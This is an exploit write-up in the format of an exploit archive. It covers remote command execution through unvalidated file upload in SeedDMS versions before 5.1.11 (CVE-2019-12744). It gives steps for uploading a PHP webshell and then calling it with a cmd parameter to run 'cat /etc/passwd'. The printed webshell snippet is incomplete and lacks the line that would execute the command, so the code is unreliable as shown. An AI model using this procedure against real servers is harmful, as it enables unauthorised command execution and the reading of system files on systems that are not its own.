# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]  
# Google Dork: [NA]  
# Date: [20-June-2019]  
# Exploit Author: [Nimit Jain](  
# Vendor Homepage: []  
# Software Link: []  
# Version: [SeedDMS versions <5.1.11] (REQUIRED)  
# Tested on: [NA]  
# CVE : [CVE-2019-12744]  
Exploit Steps:  
Step 1: Login to the application and under any folder add a document.  
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.  
PHP Backdoor Code:   
echo "<pre>";  
$cmd = ($_REQUEST['cmd']);  
echo "</pre>";  
Step 3: Now after uploading the file check the document id corresponding to the document.  
Step 4: Now go to"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.  
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.